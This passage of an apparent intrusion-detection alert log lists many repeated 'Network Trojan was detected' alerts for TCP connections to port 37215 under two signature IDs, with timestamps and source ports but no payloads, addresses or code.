                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763825
                  SID:2829579
                  Source Port:37958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.091002
                  SID:2835222
                  Source Port:34550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.468391
                  SID:2835222
                  Source Port:55318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.514336
                  SID:2829579
                  Source Port:44740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.682326
                  SID:2829579
                  Source Port:53358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.108287
                  SID:2835222
                  Source Port:57938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.352780
                  SID:2835222
                  Source Port:41036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.662908
                  SID:2829579
                  Source Port:45838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.163791
                  SID:2835222
                  Source Port:44840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.301586
                  SID:2829579
                  Source Port:56342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.313392
                  SID:2835222
                  Source Port:40970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.417071
                  SID:2835222
                  Source Port:57222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.472890
                  SID:2829579
                  Source Port:39728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.595344
                  SID:2835222
                  Source Port:35416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.488925
                  SID:2835222
                  Source Port:39838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.800658
                  SID:2835222
                  Source Port:53280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.773467
                  SID:2829579
                  Source Port:51098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.888154
                  SID:2835222
                  Source Port:33490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.146990
                  SID:2829579
                  Source Port:58314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.018335
                  SID:2829579
                  Source Port:57014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.794160
                  SID:2829579
                  Source Port:40906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.864759
                  SID:2829579
                  Source Port:44034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.726260
                  SID:2835222
                  Source Port:41674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532217
                  SID:2835222
                  Source Port:37650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.489960
                  SID:2835222
                  Source Port:58894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.856924
                  SID:2835222
                  Source Port:46366
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.361562
                  SID:2829579
                  Source Port:43418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.396105
                  SID:2829579
                  Source Port:40386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.256775
                  SID:2835222
                  Source Port:34826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.047599
                  SID:2829579
                  Source Port:59232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.019850
                  SID:2829579
                  Source Port:38836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.427094
                  SID:2835222
                  Source Port:40006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.412698
                  SID:2835222
                  Source Port:47922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.680100
                  SID:2835222
                  Source Port:41924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.513310
                  SID:2829579
                  Source Port:54508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.169661
                  SID:2829579
                  Source Port:51928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.034911
                  SID:2835222
                  Source Port:43578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.941876
                  SID:2829579
                  Source Port:52578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.259692
                  SID:2835222
                  Source Port:42756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302858
                  SID:2829579
                  Source Port:39946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.322726
                  SID:2829579
                  Source Port:39552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.108573
                  SID:2829579
                  Source Port:56316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.159132
                  SID:2829579
                  Source Port:41938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771626
                  SID:2835222
                  Source Port:55726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.182068
                  SID:2835222
                  Source Port:43860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.531286
                  SID:2829579
                  Source Port:51180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.772276
                  SID:2829579
                  Source Port:49518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.819736
                  SID:2829579
                  Source Port:41476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.312291
                  SID:2835222
                  Source Port:45322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.985311
                  SID:2835222
                  Source Port:50110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.803145
                  SID:2835222
                  Source Port:52624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.557054
                  SID:2829579
                  Source Port:51050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.524750
                  SID:2829579
                  Source Port:52500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.617350
                  SID:2829579
                  Source Port:46012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.166033
                  SID:2835222
                  Source Port:42570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.155624
                  SID:2835222
                  Source Port:57838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.070374
                  SID:2829579
                  Source Port:43386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.150804
                  SID:2835222
                  Source Port:54618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.939939
                  SID:2829579
                  Source Port:38808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.003355
                  SID:2829579
                  Source Port:53684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.524058
                  SID:2829579
                  Source Port:48230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.343986
                  SID:2835222
                  Source Port:46514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.433445
                  SID:2829579
                  Source Port:49368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.858032
                  SID:2829579
                  Source Port:56984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.838887
                  SID:2835222
                  Source Port:40456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.324880
                  SID:2835222
                  Source Port:34384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019424
                  SID:2835222
                  Source Port:39174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.868751
                  SID:2835222
                  Source Port:40772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.537516
                  SID:2829579
                  Source Port:47718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.616592
                  SID:2829579
                  Source Port:58546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.589901
                  SID:2829579
                  Source Port:47150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.147329
                  SID:2829579
                  Source Port:60130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.800580
                  SID:2835222
                  Source Port:46874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.320743
                  SID:2835222
                  Source Port:53630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.140242
                  SID:2835222
                  Source Port:51190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.133887
                  SID:2835222
                  Source Port:55170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.787394
                  SID:2835222
                  Source Port:57628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.876445
                  SID:2835222
                  Source Port:58612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.873311
                  SID:2829579
                  Source Port:40908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.980089
                  SID:2835222
                  Source Port:51914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.448352
                  SID:2835222
                  Source Port:42242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.866267
                  SID:2829579
                  Source Port:50492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.472766
                  SID:2829579
                  Source Port:60984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189458
                  SID:2829579
                  Source Port:59010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.414477
                  SID:2835222
                  Source Port:35402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.076379
                  SID:2835222
                  Source Port:56970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.835457
                  SID:2829579
                  Source Port:50682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.929262
                  SID:2829579
                  Source Port:44982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.212811
                  SID:2835222
                  Source Port:33046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.610016
                  SID:2835222
                  Source Port:42304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.534289
                  SID:2829579
                  Source Port:49572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.831923
                  SID:2835222
                  Source Port:54220
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.872945
                  SID:2829579
                  Source Port:36462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.533117
                  SID:2829579
                  Source Port:53016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.860796
                  SID:2835222
                  Source Port:56150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.200878
                  SID:2835222
                  Source Port:38590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.992323
                  SID:2835222
                  Source Port:54078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.504767
                  SID:2829579
                  Source Port:44658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.811606
                  SID:2835222
                  Source Port:52708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.586779
                  SID:2835222
                  Source Port:54694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.861688
                  SID:2829579
                  Source Port:41864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.996169
                  SID:2835222
                  Source Port:58288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.486586
                  SID:2835222
                  Source Port:34174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.513977
                  SID:2829579
                  Source Port:35538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.526504
                  SID:2829579
                  Source Port:41526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.053819
                  SID:2835222
                  Source Port:36002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.768053
                  SID:2829579
                  Source Port:39390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.034079
                  SID:2829579
                  Source Port:49636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.929759
                  SID:2835222
                  Source Port:53214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.268531
                  SID:2835222
                  Source Port:57890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.280856
                  SID:2829579
                  Source Port:45332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.830587
                  SID:2835222
                  Source Port:54922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.005351
                  SID:2835222
                  Source Port:52624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.527873
                  SID:2829579
                  Source Port:48324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.286064
                  SID:2835222
                  Source Port:49812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.200301
                  SID:2835222
                  Source Port:51166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.790493
                  SID:2835222
                  Source Port:53838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.824394
                  SID:2835222
                  Source Port:54806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.590272
                  SID:2829579
                  Source Port:35238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.921580
                  SID:2835222
                  Source Port:50706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.901801
                  SID:2829579
                  Source Port:50390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.920264
                  SID:2835222
                  Source Port:36730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234133
                  SID:2835222
                  Source Port:57128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.770839
                  SID:2835222
                  Source Port:39344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.561465
                  SID:2835222
                  Source Port:46582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.145999
                  SID:2835222
                  Source Port:46654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.867670
                  SID:2829579
                  Source Port:60208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.571607
                  SID:2835222
                  Source Port:56626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.828950
                  SID:2829579
                  Source Port:36742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.165980
                  SID:2835222
                  Source Port:42756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514524
                  SID:2829579
                  Source Port:37850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.253247
                  SID:2829579
                  Source Port:38898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.498447
                  SID:2829579
                  Source Port:36856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.628977
                  SID:2829579
                  Source Port:39396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.278007
                  SID:2829579
                  Source Port:40590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.830274
                  SID:2835222
                  Source Port:59010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.139663
                  SID:2829579
                  Source Port:58672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.911247
                  SID:2835222
                  Source Port:36508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.824367
                  SID:2835222
                  Source Port:45926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.522159
                  SID:2829579
                  Source Port:33576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.820169
                  SID:2829579
                  Source Port:58182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.515486
                  SID:2829579
                  Source Port:55402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.098099
                  SID:2829579
                  Source Port:39632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.702243
                  SID:2829579
                  Source Port:50152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.772069
                  SID:2835222
                  Source Port:51730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.869114
                  SID:2829579
                  Source Port:37686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.441344
                  SID:2835222
                  Source Port:39998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.932459
                  SID:2829579
                  Source Port:59214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.997366
                  SID:2829579
                  Source Port:50778
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.933807
                  SID:2829579
                  Source Port:42082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.872861
                  SID:2829579
                  Source Port:50564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.915755
                  SID:2829579
                  Source Port:40472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.558089
                  SID:2829579
                  Source Port:46280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.412388
                  SID:2835222
                  Source Port:37418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.759873
                  SID:2835222
                  Source Port:48820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.591326
                  SID:2835222
                  Source Port:46162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.419157
                  SID:2829579
                  Source Port:47962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.942698
                  SID:2829579
                  Source Port:38878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.868088
                  SID:2829579
                  Source Port:49620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.752380
                  SID:2835222
                  Source Port:54904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.175593
                  SID:2835222
                  Source Port:38692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.959862
                  SID:2829579
                  Source Port:55994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609490
                  SID:2835222
                  Source Port:39840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.348591
                  SID:2835222
                  Source Port:35540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.397688
                  SID:2835222
                  Source Port:60166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.305980
                  SID:2835222
                  Source Port:45158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.778513
                  SID:2829579
                  Source Port:55848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369689
                  SID:2835222
                  Source Port:49646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.439109
                  SID:2835222
                  Source Port:39918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.050918
                  SID:2829579
                  Source Port:45526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.436207
                  SID:2835222
                  Source Port:36644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.619683
                  SID:2829579
                  Source Port:53450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.542155
                  SID:2829579
                  Source Port:42606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.429801
                  SID:2829579
                  Source Port:51184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.566526
                  SID:2835222
                  Source Port:36014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.139114
                  SID:2829579
                  Source Port:40640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.532226
                  SID:2835222
                  Source Port:53430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.329520
                  SID:2835222
                  Source Port:34208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.273288
                  SID:2829579
                  Source Port:47988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.648004
                  SID:2829579
                  Source Port:56064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.639081
                  SID:2829579
                  Source Port:55058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.333954
                  SID:2835222
                  Source Port:59842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.170631
                  SID:2835222
